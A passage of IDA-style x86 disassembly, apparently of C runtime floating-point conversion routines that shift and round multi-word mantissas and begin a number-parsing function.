		mov	ecx, [ebp+var_4]
		or	esi, [ebp+var_C]
		mov	[ebx], esi
		mov	esi, [ebp+var_10]
		shl	esi, cl
		inc	[ebp+arg_0]
		cmp	[ebp+arg_0], 3
		mov	[ebp+var_C], esi
		jl	short loc_4120FF
		mov	esi, eax
		push	2
		shl	esi, 2
		lea	ecx, [ebp+var_18]
		pop	edx
		sub	ecx, esi

loc_412139:				; CODE XREF: sub_411F29+227j
		cmp	edx, eax
		jl	short loc_412145
		mov	esi, [ecx]
		mov	[ebp+edx*4+var_20], esi
		jmp	short loc_41214A
; ---------------------------------------------------------------------------

loc_412145:				; CODE XREF: sub_411F29+212j
		and	[ebp+edx*4+var_20], 0

loc_41214A:				; CODE XREF: sub_411F29+21Aj
		dec	edx
		sub	ecx, 4
		test	edx, edx
		jge	short loc_412139
		mov	esi, dword_425238
		dec	esi
		lea	ecx, [esi+1]
		mov	eax, ecx
		cdq
		and	edx, 1Fh
		add	eax, edx
		sar	eax, 5
		mov	edx, ecx
		and	edx, 8000001Fh
		mov	[ebp+var_C], eax
		jns	short loc_412179
		dec	edx
		or	edx, 0FFFFFFE0h
		inc	edx

loc_412179:				; CODE XREF: sub_411F29+249j
		push	1Fh
		pop	ecx
		sub	ecx, edx
		xor	edx, edx
		inc	edx
		shl	edx, cl
		lea	ebx, [ebp+eax*4+var_20]
		mov	[ebp+var_10], ecx
		test	[ebx], edx
		jz	loc_412214
		or	edx, 0FFFFFFFFh
		shl	edx, cl
		not	edx
		test	[ebp+eax*4+var_20], edx
		jmp	short loc_4121A4
; ---------------------------------------------------------------------------

loc_41219F:				; CODE XREF: sub_411F29+281j
		cmp	[ebp+eax*4+var_20], 0

loc_4121A4:				; CODE XREF: sub_411F29+274j
		jnz	short loc_4121AE
		inc	eax
		cmp	eax, 3
		jl	short loc_41219F
		jmp	short loc_412214
; ---------------------------------------------------------------------------

loc_4121AE:				; CODE XREF: sub_411F29:loc_4121A4j
		mov	eax, esi
		cdq
		push	1Fh
		pop	ecx
		and	edx, ecx
		add	eax, edx
		sar	eax, 5
		and	esi, 8000001Fh
		jns	short loc_4121C8
		dec	esi
		or	esi, 0FFFFFFE0h
		inc	esi

loc_4121C8:				; CODE XREF: sub_411F29+298j
		and	[ebp+arg_0], 0
		xor	edx, edx
		sub	ecx, esi
		inc	edx
		shl	edx, cl
		lea	ecx, [ebp+eax*4+var_20]
		mov	esi, [ecx]
		lea	edi, [esi+edx]
		cmp	edi, esi
		jb	short loc_4121E4
		cmp	edi, edx
		jnb	short loc_4121EB

loc_4121E4:				; CODE XREF: sub_411F29+2B5j
		mov	[ebp+arg_0], 1

loc_4121EB:				; CODE XREF: sub_411F29+2B9j
		mov	[ecx], edi
		mov	ecx, [ebp+arg_0]
		jmp	short loc_412211
; ---------------------------------------------------------------------------

loc_4121F2:				; CODE XREF: sub_411F29+2E9j
		test	ecx, ecx
		jz	short loc_412214
		lea	ecx, [ebp+eax*4+var_20]
		mov	edx, [ecx]
		lea	esi, [edx+1]
		xor	edi, edi
		cmp	esi, edx
		jb	short loc_41220A
		cmp	esi, 1
		jnb	short loc_41220D

loc_41220A:				; CODE XREF: sub_411F29+2DAj
		xor	edi, edi
		inc	edi

loc_41220D:				; CODE XREF: sub_411F29+2DFj
		mov	[ecx], esi
		mov	ecx, edi

loc_412211:				; CODE XREF: sub_411F29+2C7j
		dec	eax
		jns	short loc_4121F2

loc_412214:				; CODE XREF: sub_411F29+263j
					; sub_411F29+283j ...
		mov	ecx, [ebp+var_10]
		or	eax, 0FFFFFFFFh
		shl	eax, cl
		and	[ebx], eax
		mov	eax, [ebp+var_C]
		inc	eax
		cmp	eax, 3
		jge	short loc_412234
		push	3
		pop	ecx
		lea	edi, [ebp+eax*4+var_20]
		sub	ecx, eax
		xor	eax, eax
		rep stosd

loc_412234:				; CODE XREF: sub_411F29+2FCj
		mov	ecx, dword_42523C
		inc	ecx
		mov	eax, ecx
		cdq
		and	edx, 1Fh
		add	eax, edx
		mov	edx, ecx
		sar	eax, 5
		and	edx, 8000001Fh
		jns	short loc_412255
		dec	edx
		or	edx, 0FFFFFFE0h
		inc	edx

loc_412255:				; CODE XREF: sub_411F29+325j
		and	[ebp+var_C], 0
		and	[ebp+arg_0], 0
		or	edi, 0FFFFFFFFh
		mov	ecx, edx
		shl	edi, cl
		mov	[ebp+var_4], 20h
		sub	[ebp+var_4], edx
		not	edi

loc_412270:				; CODE XREF: sub_411F29+372j
		mov	ebx, [ebp+arg_0]
		lea	ebx, [ebp+ebx*4+var_20]
		mov	esi, [ebx]
		mov	ecx, esi
		and	ecx, edi
		mov	[ebp+var_10], ecx
		mov	ecx, edx
		shr	esi, cl
		mov	ecx, [ebp+var_4]
		or	esi, [ebp+var_C]
		mov	[ebx], esi
		mov	esi, [ebp+var_10]
		shl	esi, cl
		inc	[ebp+arg_0]
		cmp	[ebp+arg_0], 3
		mov	[ebp+var_C], esi
		jl	short loc_412270
		mov	esi, eax
		push	2
		shl	esi, 2
		lea	ecx, [ebp+var_18]
		pop	edx
		sub	ecx, esi

loc_4122AA:				; CODE XREF: sub_411F29+398j
		cmp	edx, eax
		jl	short loc_4122B6
		mov	esi, [ecx]
		mov	[ebp+edx*4+var_20], esi
		jmp	short loc_4122BB
; ---------------------------------------------------------------------------

loc_4122B6:				; CODE XREF: sub_411F29+383j
		and	[ebp+edx*4+var_20], 0

loc_4122BB:				; CODE XREF: sub_411F29+38Bj
		dec	edx
		sub	ecx, 4
		test	edx, edx
		jge	short loc_4122AA

loc_4122C3:				; CODE XREF: sub_411F29+188j
		push	2
		xor	ebx, ebx
		pop	eax
		jmp	loc_412427
; ---------------------------------------------------------------------------

loc_4122CD:				; CODE XREF: sub_411F29+18Fj
		cmp	ebx, dword_425230
		mov	ecx, dword_42523C
		jl	loc_41238C
		xor	eax, eax
		lea	edi, [ebp+var_20]
		stosd
		stosd
		stosd
		or	[ebp+var_20], 80000000h
		mov	eax, ecx
		cdq
		and	edx, 1Fh
		add	eax, edx
		mov	edx, ecx
		sar	eax, 5
		and	edx, 8000001Fh
		jns	short loc_412308
		dec	edx
		or	edx, 0FFFFFFE0h
		inc	edx

loc_412308:				; CODE XREF: sub_411F29+3D8j
		and	[ebp+var_C], 0
		and	[ebp+arg_0], 0
		or	edi, 0FFFFFFFFh
		mov	ecx, edx
		shl	edi, cl
		mov	[ebp+var_4], 20h
		sub	[ebp+var_4], edx
		not	edi

loc_412323:				; CODE XREF: sub_411F29+425j
		mov	ebx, [ebp+arg_0]
		lea	ebx, [ebp+ebx*4+var_20]
		mov	esi, [ebx]
		mov	ecx, esi
		and	ecx, edi
		mov	[ebp+var_10], ecx
		mov	ecx, edx
		shr	esi, cl
		mov	ecx, [ebp+var_4]
		or	esi, [ebp+var_C]
		mov	[ebx], esi
		mov	esi, [ebp+var_10]
		shl	esi, cl
		inc	[ebp+arg_0]
		cmp	[ebp+arg_0], 3
		mov	[ebp+var_C], esi
		jl	short loc_412323
		mov	esi, eax
		push	2
		shl	esi, 2
		lea	ecx, [ebp+var_18]
		pop	edx
		sub	ecx, esi

loc_41235D:				; CODE XREF: sub_411F29+44Bj
		cmp	edx, eax
		jl	short loc_412369
		mov	esi, [ecx]
		mov	[ebp+edx*4+var_20], esi
		jmp	short loc_41236E
; ---------------------------------------------------------------------------

loc_412369:				; CODE XREF: sub_411F29+436j
		and	[ebp+edx*4+var_20], 0

loc_41236E:				; CODE XREF: sub_411F29+43Ej
		dec	edx
		sub	ecx, 4
		test	edx, edx
		jge	short loc_41235D
		mov	eax, dword_425230
		mov	ecx, dword_425244
		lea	ebx, [ecx+eax]
		xor	eax, eax
		inc	eax
		jmp	loc_412427
; ---------------------------------------------------------------------------

loc_41238C:				; CODE XREF: sub_411F29+3B0j
		mov	eax, dword_425244
		and	[ebp+var_20], 7FFFFFFFh
		add	ebx, eax
		mov	eax, ecx
		cdq
		and	edx, 1Fh
		add	eax, edx
		mov	edx, ecx
		sar	eax, 5
		and	edx, 8000001Fh
		jns	short loc_4123B4
		dec	edx
		or	edx, 0FFFFFFE0h
		inc	edx

loc_4123B4:				; CODE XREF: sub_411F29+484j
		and	[ebp+var_C], 0
		and	[ebp+arg_0], 0
		or	esi, 0FFFFFFFFh
		mov	ecx, edx
		shl	esi, cl
		mov	[ebp+var_4], 20h
		sub	[ebp+var_4], edx
		not	esi

loc_4123CF:				; CODE XREF: sub_411F29+4D4j
		mov	ecx, [ebp+arg_0]
		mov	edi, [ebp+ecx*4+var_20]
		mov	ecx, edi
		and	ecx, esi
		mov	[ebp+var_10], ecx
		mov	ecx, edx
		shr	edi, cl
		mov	ecx, [ebp+arg_0]
		or	edi, [ebp+var_C]
		mov	[ebp+ecx*4+var_20], edi
		mov	edi, [ebp+var_10]
		mov	ecx, [ebp+var_4]
		shl	edi, cl
		inc	[ebp+arg_0]
		cmp	[ebp+arg_0], 3
		mov	[ebp+var_C], edi
		jl	short loc_4123CF
		mov	esi, eax
		push	2
		shl	esi, 2
		lea	ecx, [ebp+var_18]
		pop	edx
		sub	ecx, esi

loc_41240C:				; CODE XREF: sub_411F29+4FAj
		cmp	edx, eax
		jl	short loc_412418
		mov	esi, [ecx]
		mov	[ebp+edx*4+var_20], esi
		jmp	short loc_41241D
; ---------------------------------------------------------------------------

loc_412418:				; CODE XREF: sub_411F29+4E5j
		and	[ebp+edx*4+var_20], 0

loc_41241D:				; CODE XREF: sub_411F29+4EDj
		dec	edx
		sub	ecx, 4
		test	edx, edx
		jge	short loc_41240C
		xor	eax, eax

loc_412427:				; CODE XREF: sub_411F29+39Fj
					; sub_411F29+45Ej
		pop	esi

loc_412428:				; CODE XREF: sub_411F29+55j
					; sub_411F29+65j
		push	1Fh
		pop	ecx
		sub	ecx, dword_42523C
		shl	ebx, cl
		mov	ecx, [ebp+var_14]
		neg	ecx
		sbb	ecx, ecx
		and	ecx, 80000000h
		or	ebx, ecx
		mov	ecx, dword_425240
		or	ebx, [ebp+var_20]
		cmp	ecx, 40h
		jnz	short loc_41245D
		mov	ecx, [ebp+arg_4]
		mov	edx, [ebp+var_1C]
		mov	[ecx+4], ebx
		mov	[ecx], edx
		jmp	short loc_412467
; ---------------------------------------------------------------------------

loc_41245D:				; CODE XREF: sub_411F29+525j
		cmp	ecx, 20h
		jnz	short loc_412467
		mov	ecx, [ebp+arg_4]
		mov	[ecx], ebx

loc_412467:				; CODE XREF: sub_411F29+532j
					; sub_411F29+537j
		pop	edi
		pop	ebx
		leave
		retn
sub_411F29	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_41246B	proc near		; CODE XREF: sub_411B13+44p

var_2C		= byte ptr -2Ch
var_20		= dword	ptr -20h
var_1C		= dword	ptr -1Ch
var_18		= dword	ptr -18h
var_14		= dword	ptr -14h
var_10		= dword	ptr -10h
var_C		= dword	ptr -0Ch
var_8		= dword	ptr -8
var_4		= dword	ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch

		push	ebp
		mov	ebp, esp
		sub	esp, 2Ch
		mov	eax, [ebp+arg_0]
		movzx	ecx, word ptr [eax+0Ah]
		push	ebx
		mov	ebx, ecx
		and	ecx, 8000h
		mov	[ebp+var_14], ecx
		mov	ecx, [eax+6]
		mov	[ebp+var_20], ecx
		mov	ecx, [eax+2]
		movzx	eax, word ptr [eax]
		and	ebx, 7FFFh
		sub	ebx, 3FFFh
		shl	eax, 10h
		cmp	ebx, 0FFFFC001h
		push	edi
		mov	[ebp+var_1C], ecx
		mov	[ebp+var_18], eax
		jnz	short loc_4124D5
		xor	ebx, ebx
		xor	eax, eax

loc_4124B2:				; CODE XREF: sub_41246B+51j
		cmp	[ebp+eax*4+var_20], ebx
		jnz	short loc_4124C5
		inc	eax
		cmp	eax, 3
		jl	short loc_4124B2
		xor	eax, eax
		jmp	loc_41296A
; ---------------------------------------------------------------------------

loc_4124C5:				; CODE XREF: sub_41246B+4Bj
		xor	eax, eax
		lea	edi, [ebp+var_20]
		stosd
		stosd
		push	2
		stosd
		pop	eax
		jmp	loc_41296A
; ---------------------------------------------------------------------------

loc_4124D5:				; CODE XREF: sub_41246B+41j
		and	[ebp+arg_0], 0
		push	esi
		lea	esi, [ebp+var_20]
		lea	edi, [ebp+var_2C]
		movsd
		movsd
		movsd
		mov	esi, dword_425250
		dec	esi
		lea	ecx, [esi+1]
		mov	eax, ecx
		cdq
		and	edx, 1Fh
		add	eax, edx
		sar	eax, 5
		mov	edx, ecx
		and	edx, 8000001Fh
		mov	[ebp+var_10], ebx
		mov	[ebp+var_C], eax
		jns	short loc_41250D
		dec	edx
		or	edx, 0FFFFFFE0h
		inc	edx

loc_41250D:				; CODE XREF: sub_41246B+9Bj
		lea	edi, [ebp+eax*4+var_20]
		push	1Fh
		xor	eax, eax
		pop	ecx
		sub	ecx, edx
		inc	eax
		shl	eax, cl
		mov	[ebp+var_8], ecx
		test	[edi], eax
		jz	loc_4125B3
		mov	eax, [ebp+var_C]
		or	edx, 0FFFFFFFFh
		shl	edx, cl
		not	edx
		test	[ebp+eax*4+var_20], edx
		jmp	short loc_41253B
; ---------------------------------------------------------------------------

loc_412536:				; CODE XREF: sub_41246B+D6j
		cmp	[ebp+eax*4+var_20], 0

loc_41253B:				; CODE XREF: sub_41246B+C9j
		jnz	short loc_412545
		inc	eax
		cmp	eax, 3
		jl	short loc_412536
		jmp	short loc_4125B3
; ---------------------------------------------------------------------------

loc_412545:				; CODE XREF: sub_41246B:loc_41253Bj
		mov	eax, esi
		cdq
		push	1Fh
		pop	ecx
		and	edx, ecx
		add	eax, edx
		sar	eax, 5
		and	esi, 8000001Fh
		jns	short loc_41255F
		dec	esi
		or	esi, 0FFFFFFE0h
		inc	esi

loc_41255F:				; CODE XREF: sub_41246B+EDj
		and	[ebp+var_4], 0
		sub	ecx, esi
		xor	edx, edx
		inc	edx
		shl	edx, cl
		lea	ecx, [ebp+eax*4+var_20]
		mov	esi, [ecx]
		add	esi, edx
		mov	[ebp+arg_0], esi
		mov	esi, [ecx]
		cmp	[ebp+arg_0], esi
		jb	short loc_41259E
		cmp	[ebp+arg_0], edx
		jmp	short loc_41259C
; ---------------------------------------------------------------------------

loc_412581:				; CODE XREF: sub_41246B+143j
		test	ecx, ecx
		jz	short loc_4125B0
		and	[ebp+var_4], 0
		lea	ecx, [ebp+eax*4+var_20]
		mov	edx, [ecx]
		lea	esi, [edx+1]
		cmp	esi, edx
		mov	[ebp+arg_0], esi
		jb	short loc_41259E
		cmp	esi, 1

loc_41259C:				; CODE XREF: sub_41246B+114j
		jnb	short loc_4125A5

loc_41259E:				; CODE XREF: sub_41246B+10Fj
					; sub_41246B+12Cj
		mov	[ebp+var_4], 1

loc_4125A5:				; CODE XREF: sub_41246B:loc_41259Cj
		dec	eax
		mov	edx, [ebp+arg_0]
		mov	[ecx], edx
		mov	ecx, [ebp+var_4]
		jns	short loc_412581

loc_4125B0:				; CODE XREF: sub_41246B+118j
		mov	[ebp+arg_0], ecx

loc_4125B3:				; CODE XREF: sub_41246B+B5j
					; sub_41246B+D8j
		mov	ecx, [ebp+var_8]
		or	eax, 0FFFFFFFFh
		shl	eax, cl
		and	[edi], eax
		mov	eax, [ebp+var_C]
		inc	eax
		cmp	eax, 3
		jge	short loc_4125D3
		push	3
		pop	ecx
		lea	edi, [ebp+eax*4+var_20]
		sub	ecx, eax
		xor	eax, eax
		rep stosd

loc_4125D3:				; CODE XREF: sub_41246B+159j
		cmp	[ebp+arg_0], 0
		jz	short loc_4125DA
		inc	ebx

loc_4125DA:				; CODE XREF: sub_41246B+16Cj
		mov	eax, dword_42524C
		mov	ecx, eax
		sub	ecx, dword_425250
		cmp	ebx, ecx
		jge	short loc_4125F8
		xor	eax, eax
		lea	edi, [ebp+var_20]
		stosd
		stosd
		stosd
		jmp	loc_412805
; ---------------------------------------------------------------------------

loc_4125F8:				; CODE XREF: sub_41246B+17Ej
		cmp	ebx, eax
		jg	loc_41280F
		sub	eax, [ebp+var_10]
		lea	esi, [ebp+var_2C]
		mov	ecx, eax
		lea	edi, [ebp+var_20]
		movsd
		cdq
		and	edx, 1Fh
		add	eax, edx
		movsd
		mov	edx, ecx
		sar	eax, 5
		and	edx, 8000001Fh
		movsd
		jns	short loc_412626
		dec	edx
		or	edx, 0FFFFFFE0h
		inc	edx

loc_412626:				; CODE XREF: sub_41246B+1B4j
		and	[ebp+var_C], 0
		and	[ebp+arg_0], 0
		or	edi, 0FFFFFFFFh
		mov	ecx, edx
		shl	edi, cl
		mov	[ebp+var_4], 20h
		sub	[ebp+var_4], edx
		not	edi

loc_412641:				; CODE XREF: sub_41246B+201j
		mov	ebx, [ebp+arg_0]
		lea	ebx, [ebp+ebx*4+var_20]
		mov	esi, [ebx]
		mov	ecx, esi
		and	ecx, edi
		mov	[ebp+var_10], ecx
		mov	ecx, edx
		shr	esi, cl
		mov	ecx, [ebp+var_4]
		or	esi, [ebp+var_C]
		mov	[ebx], esi
		mov	esi, [ebp+var_10]
		shl	esi, cl
		inc	[ebp+arg_0]
		cmp	[ebp+arg_0], 3
		mov	[ebp+var_C], esi
		jl	short loc_412641
		mov	esi, eax
		push	2
		shl	esi, 2
		lea	ecx, [ebp+var_18]
		pop	edx
		sub	ecx, esi

loc_41267B:				; CODE XREF: sub_41246B+227j
		cmp	edx, eax
		jl	short loc_412687
		mov	esi, [ecx]
		mov	[ebp+edx*4+var_20], esi
		jmp	short loc_41268C
; ---------------------------------------------------------------------------

loc_412687:				; CODE XREF: sub_41246B+212j
		and	[ebp+edx*4+var_20], 0

loc_41268C:				; CODE XREF: sub_41246B+21Aj
		dec	edx
		sub	ecx, 4
		test	edx, edx
		jge	short loc_41267B
		mov	esi, dword_425250
		dec	esi
		lea	ecx, [esi+1]
		mov	eax, ecx
		cdq
		and	edx, 1Fh
		add	eax, edx
		sar	eax, 5
		mov	edx, ecx
		and	edx, 8000001Fh
		mov	[ebp+var_C], eax
		jns	short loc_4126BB
		dec	edx
		or	edx, 0FFFFFFE0h
		inc	edx

loc_4126BB:				; CODE XREF: sub_41246B+249j
		push	1Fh
		pop	ecx
		sub	ecx, edx
		xor	edx, edx
		inc	edx
		shl	edx, cl
		lea	ebx, [ebp+eax*4+var_20]
		mov	[ebp+var_10], ecx
		test	[ebx], edx
		jz	loc_412756
		or	edx, 0FFFFFFFFh
		shl	edx, cl
		not	edx
		test	[ebp+eax*4+var_20], edx
		jmp	short loc_4126E6
; ---------------------------------------------------------------------------

loc_4126E1:				; CODE XREF: sub_41246B+281j
		cmp	[ebp+eax*4+var_20], 0

loc_4126E6:				; CODE XREF: sub_41246B+274j
		jnz	short loc_4126F0
		inc	eax
		cmp	eax, 3
		jl	short loc_4126E1
		jmp	short loc_412756
; ---------------------------------------------------------------------------

loc_4126F0:				; CODE XREF: sub_41246B:loc_4126E6j
		mov	eax, esi
		cdq
		push	1Fh
		pop	ecx
		and	edx, ecx
		add	eax, edx
		sar	eax, 5
		and	esi, 8000001Fh
		jns	short loc_41270A
		dec	esi
		or	esi, 0FFFFFFE0h
		inc	esi

loc_41270A:				; CODE XREF: sub_41246B+298j
		and	[ebp+arg_0], 0
		xor	edx, edx
		sub	ecx, esi
		inc	edx
		shl	edx, cl
		lea	ecx, [ebp+eax*4+var_20]
		mov	esi, [ecx]
		lea	edi, [esi+edx]
		cmp	edi, esi
		jb	short loc_412726
		cmp	edi, edx
		jnb	short loc_41272D

loc_412726:				; CODE XREF: sub_41246B+2B5j
		mov	[ebp+arg_0], 1

loc_41272D:				; CODE XREF: sub_41246B+2B9j
		mov	[ecx], edi
		mov	ecx, [ebp+arg_0]
		jmp	short loc_412753
; ---------------------------------------------------------------------------

loc_412734:				; CODE XREF: sub_41246B+2E9j
		test	ecx, ecx
		jz	short loc_412756
		lea	ecx, [ebp+eax*4+var_20]
		mov	edx, [ecx]
		lea	esi, [edx+1]
		xor	edi, edi
		cmp	esi, edx
		jb	short loc_41274C
		cmp	esi, 1
		jnb	short loc_41274F

loc_41274C:				; CODE XREF: sub_41246B+2DAj
		xor	edi, edi
		inc	edi

loc_41274F:				; CODE XREF: sub_41246B+2DFj
		mov	[ecx], esi
		mov	ecx, edi

loc_412753:				; CODE XREF: sub_41246B+2C7j
		dec	eax
		jns	short loc_412734

loc_412756:				; CODE XREF: sub_41246B+263j
					; sub_41246B+283j ...
		mov	ecx, [ebp+var_10]
		or	eax, 0FFFFFFFFh
		shl	eax, cl
		and	[ebx], eax
		mov	eax, [ebp+var_C]
		inc	eax
		cmp	eax, 3
		jge	short loc_412776
		push	3
		pop	ecx
		lea	edi, [ebp+eax*4+var_20]
		sub	ecx, eax
		xor	eax, eax
		rep stosd

loc_412776:				; CODE XREF: sub_41246B+2FCj
		mov	ecx, dword_425254
		inc	ecx
		mov	eax, ecx
		cdq
		and	edx, 1Fh
		add	eax, edx
		mov	edx, ecx
		sar	eax, 5
		and	edx, 8000001Fh
		jns	short loc_412797
		dec	edx
		or	edx, 0FFFFFFE0h
		inc	edx

loc_412797:				; CODE XREF: sub_41246B+325j
		and	[ebp+var_C], 0
		and	[ebp+arg_0], 0
		or	edi, 0FFFFFFFFh
		mov	ecx, edx
		shl	edi, cl
		mov	[ebp+var_4], 20h
		sub	[ebp+var_4], edx
		not	edi

loc_4127B2:				; CODE XREF: sub_41246B+372j
		mov	ebx, [ebp+arg_0]
		lea	ebx, [ebp+ebx*4+var_20]
		mov	esi, [ebx]
		mov	ecx, esi
		and	ecx, edi
		mov	[ebp+var_10], ecx
		mov	ecx, edx
		shr	esi, cl
		mov	ecx, [ebp+var_4]
		or	esi, [ebp+var_C]
		mov	[ebx], esi
		mov	esi, [ebp+var_10]
		shl	esi, cl
		inc	[ebp+arg_0]
		cmp	[ebp+arg_0], 3
		mov	[ebp+var_C], esi
		jl	short loc_4127B2
		mov	esi, eax
		push	2
		shl	esi, 2
		lea	ecx, [ebp+var_18]
		pop	edx
		sub	ecx, esi

loc_4127EC:				; CODE XREF: sub_41246B+398j
		cmp	edx, eax
		jl	short loc_4127F8
		mov	esi, [ecx]
		mov	[ebp+edx*4+var_20], esi
		jmp	short loc_4127FD
; ---------------------------------------------------------------------------

loc_4127F8:				; CODE XREF: sub_41246B+383j
		and	[ebp+edx*4+var_20], 0

loc_4127FD:				; CODE XREF: sub_41246B+38Bj
		dec	edx
		sub	ecx, 4
		test	edx, edx
		jge	short loc_4127EC

loc_412805:				; CODE XREF: sub_41246B+188j
		push	2
		xor	ebx, ebx
		pop	eax
		jmp	loc_412969
; ---------------------------------------------------------------------------

loc_41280F:				; CODE XREF: sub_41246B+18Fj
		cmp	ebx, dword_425248
		mov	ecx, dword_425254
		jl	loc_4128CE
		xor	eax, eax
		lea	edi, [ebp+var_20]
		stosd
		stosd
		stosd
		or	[ebp+var_20], 80000000h
		mov	eax, ecx
		cdq
		and	edx, 1Fh
		add	eax, edx
		mov	edx, ecx
		sar	eax, 5
		and	edx, 8000001Fh
		jns	short loc_41284A
		dec	edx
		or	edx, 0FFFFFFE0h
		inc	edx

loc_41284A:				; CODE XREF: sub_41246B+3D8j
		and	[ebp+var_C], 0
		and	[ebp+arg_0], 0
		or	edi, 0FFFFFFFFh
		mov	ecx, edx
		shl	edi, cl
		mov	[ebp+var_4], 20h
		sub	[ebp+var_4], edx
		not	edi

loc_412865:				; CODE XREF: sub_41246B+425j
		mov	ebx, [ebp+arg_0]
		lea	ebx, [ebp+ebx*4+var_20]
		mov	esi, [ebx]
		mov	ecx, esi
		and	ecx, edi
		mov	[ebp+var_10], ecx
		mov	ecx, edx
		shr	esi, cl
		mov	ecx, [ebp+var_4]
		or	esi, [ebp+var_C]
		mov	[ebx], esi
		mov	esi, [ebp+var_10]
		shl	esi, cl
		inc	[ebp+arg_0]
		cmp	[ebp+arg_0], 3
		mov	[ebp+var_C], esi
		jl	short loc_412865
		mov	esi, eax
		push	2
		shl	esi, 2
		lea	ecx, [ebp+var_18]
		pop	edx
		sub	ecx, esi

loc_41289F:				; CODE XREF: sub_41246B+44Bj
		cmp	edx, eax
		jl	short loc_4128AB
		mov	esi, [ecx]
		mov	[ebp+edx*4+var_20], esi
		jmp	short loc_4128B0
; ---------------------------------------------------------------------------

loc_4128AB:				; CODE XREF: sub_41246B+436j
		and	[ebp+edx*4+var_20], 0

loc_4128B0:				; CODE XREF: sub_41246B+43Ej
		dec	edx
		sub	ecx, 4
		test	edx, edx
		jge	short loc_41289F
		mov	eax, dword_425248
		mov	ecx, dword_42525C
		lea	ebx, [ecx+eax]
		xor	eax, eax
		inc	eax
		jmp	loc_412969
; ---------------------------------------------------------------------------

loc_4128CE:				; CODE XREF: sub_41246B+3B0j
		mov	eax, dword_42525C
		and	[ebp+var_20], 7FFFFFFFh
		add	ebx, eax
		mov	eax, ecx
		cdq
		and	edx, 1Fh
		add	eax, edx
		mov	edx, ecx
		sar	eax, 5
		and	edx, 8000001Fh
		jns	short loc_4128F6
		dec	edx
		or	edx, 0FFFFFFE0h
		inc	edx

loc_4128F6:				; CODE XREF: sub_41246B+484j
		and	[ebp+var_C], 0
		and	[ebp+arg_0], 0
		or	esi, 0FFFFFFFFh
		mov	ecx, edx
		shl	esi, cl
		mov	[ebp+var_4], 20h
		sub	[ebp+var_4], edx
		not	esi

loc_412911:				; CODE XREF: sub_41246B+4D4j
		mov	ecx, [ebp+arg_0]
		mov	edi, [ebp+ecx*4+var_20]
		mov	ecx, edi
		and	ecx, esi
		mov	[ebp+var_10], ecx
		mov	ecx, edx
		shr	edi, cl
		mov	ecx, [ebp+arg_0]
		or	edi, [ebp+var_C]
		mov	[ebp+ecx*4+var_20], edi
		mov	edi, [ebp+var_10]
		mov	ecx, [ebp+var_4]
		shl	edi, cl
		inc	[ebp+arg_0]
		cmp	[ebp+arg_0], 3
		mov	[ebp+var_C], edi
		jl	short loc_412911
		mov	esi, eax
		push	2
		shl	esi, 2
		lea	ecx, [ebp+var_18]
		pop	edx
		sub	ecx, esi

loc_41294E:				; CODE XREF: sub_41246B+4FAj
		cmp	edx, eax
		jl	short loc_41295A
		mov	esi, [ecx]
		mov	[ebp+edx*4+var_20], esi
		jmp	short loc_41295F
; ---------------------------------------------------------------------------

loc_41295A:				; CODE XREF: sub_41246B+4E5j
		and	[ebp+edx*4+var_20], 0

loc_41295F:				; CODE XREF: sub_41246B+4EDj
		dec	edx
		sub	ecx, 4
		test	edx, edx
		jge	short loc_41294E
		xor	eax, eax

loc_412969:				; CODE XREF: sub_41246B+39Fj
					; sub_41246B+45Ej
		pop	esi

loc_41296A:				; CODE XREF: sub_41246B+55j
					; sub_41246B+65j
		push	1Fh
		pop	ecx
		sub	ecx, dword_425254
		shl	ebx, cl
		mov	ecx, [ebp+var_14]
		neg	ecx
		sbb	ecx, ecx
		and	ecx, 80000000h
		or	ebx, ecx
		mov	ecx, dword_425258
		or	ebx, [ebp+var_20]
		cmp	ecx, 40h
		jnz	short loc_41299F
		mov	ecx, [ebp+arg_4]
		mov	edx, [ebp+var_1C]
		mov	[ecx+4], ebx
		mov	[ecx], edx
		jmp	short loc_4129A9
; ---------------------------------------------------------------------------

loc_41299F:				; CODE XREF: sub_41246B+525j
		cmp	ecx, 20h
		jnz	short loc_4129A9
		mov	ecx, [ebp+arg_4]
		mov	[ecx], ebx

loc_4129A9:				; CODE XREF: sub_41246B+532j
					; sub_41246B+537j
		pop	edi
		pop	ebx
		leave
		retn
sub_41246B	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_4129AD	proc near		; CODE XREF: sub_411A6D+37p
					; sub_411B13+37p

var_7C		= dword	ptr -7Ch
var_78		= dword	ptr -78h
var_74		= dword	ptr -74h
var_70		= dword	ptr -70h
var_6C		= dword	ptr -6Ch
var_68		= dword	ptr -68h
var_64		= dword	ptr -64h
var_60		= dword	ptr -60h
var_5C		= dword	ptr -5Ch
var_58		= dword	ptr -58h
var_54		= dword	ptr -54h
var_50		= dword	ptr -50h
var_4C		= dword	ptr -4Ch
var_48		= byte ptr -48h
var_46		= dword	ptr -46h
var_3C		= dword	ptr -3Ch
var_38		= dword	ptr -38h
var_32		= dword	ptr -32h
var_2C		= dword	ptr -2Ch
var_28		= dword	ptr -28h
var_24		= dword	ptr -24h
var_20		= byte ptr -20h
var_9		= byte ptr -9
var_4		= dword	ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h
arg_C		= dword	ptr  14h
arg_10		= dword	ptr  18h
arg_14		= dword	ptr  1Ch
arg_18		= dword	ptr  20h
arg_1C		= dword	ptr  24h

		push	ebp
		mov	ebp, esp
		sub	esp, 7Ch
		mov	eax, dword_424064
		xor	eax, ebp
		mov	[ebp+var_4], eax
		mov	eax, [ebp+arg_0]
		push	ebx
		xor	ebx, ebx
		push	esi
		xor	esi, esi
		mov	[ebp+var_7C], eax
		mov	eax, [ebp+arg_4]
		inc	esi
		xor	ecx, ecx
		cmp	[ebp+arg_1C], ebx
		push	edi
		mov	[ebp+var_70], eax
		lea	edi, [ebp+var_20]
		mov	[ebp+var_74], ebx
		mov	[ebp+var_68], esi
		mov	[ebp+var_4C], ebx
		mov	[ebp+var_58], ebx
		mov	[ebp+var_5C], ebx
		mov	[ebp+var_60], ebx
		mov	[ebp+var_64], ebx
		mov	[ebp+var_50], ebx
		mov	[ebp+var_6C], ebx
		jnz	short loc_412A15
		call	sub_405D93
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		mov	dword ptr [eax], 16h
		call	sub_4034C7
		add	esp, 14h
		xor	eax, eax
		jmp	loc_41302F
; ---------------------------------------------------------------------------

loc_412A15:				; CODE XREF: sub_4129AD+47j
		mov	edx, [ebp+arg_8]
		mov	[ebp+var_54], edx
